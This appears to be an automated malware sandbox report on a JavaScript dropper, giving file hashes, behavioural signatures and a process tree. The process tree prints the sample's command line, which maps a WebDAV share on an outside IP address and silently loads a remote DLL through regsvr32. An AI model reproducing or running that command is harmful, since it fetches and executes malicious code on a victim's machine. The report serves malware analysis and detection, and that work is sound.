Analysis
-
max time kernel
131s -
max time network
129s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
24/07/2024, 02:20
Static task
static1
Behavioral task
behavioral1
Sample
8670dabf76b83c72fa2aba1f56adc85e6969e93e97c8d06f2c718d46191c3060.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
8670dabf76b83c72fa2aba1f56adc85e6969e93e97c8d06f2c718d46191c3060.js
Resource
win10v2004-20240709-en
General
-
Target
8670dabf76b83c72fa2aba1f56adc85e6969e93e97c8d06f2c718d46191c3060.js
-
Size
4KB
-
MD5
e7d51d7b8b83a1b60cd746a13f23a06e
-
SHA1
fbec88687c765dd7c78c181cbc96ba4532ccc603
-
SHA256
8670dabf76b83c72fa2aba1f56adc85e6969e93e97c8d06f2c718d46191c3060
-
SHA512
f11e3641c5540bc4e3b6b7db5d6783edfb7e8a885879ec77079ce7acfc7d34eff7d5c3e19632ed172370c81928331a364d4fdc545bb5b1ad592f7d18d2db2c44
-
SSDEEP
96:VV+BmZzh/wDj8tLq1t7cCZzuFxHPlQHIFFlVJW5yk5zZU5lZ+JOOkF5JZSUr5zkN:VV+BmZzh/wDj8tLq1t7cCZzuFxHPlQHx
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 956 wrote to memory of 4996 956 wscript.exe 84 PID 956 wrote to memory of 4996 956 wscript.exe 84 PID 4996 wrote to memory of 4804 4996 cmd.exe 86 PID 4996 wrote to memory of 4804 4996 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\8670dabf76b83c72fa2aba1f56adc85e6969e93e97c8d06f2c718d46191c3060.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\536342004606.dll2⤵
- Suspicious use of WriteProcessMemory
PID:4996 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:4804
-
-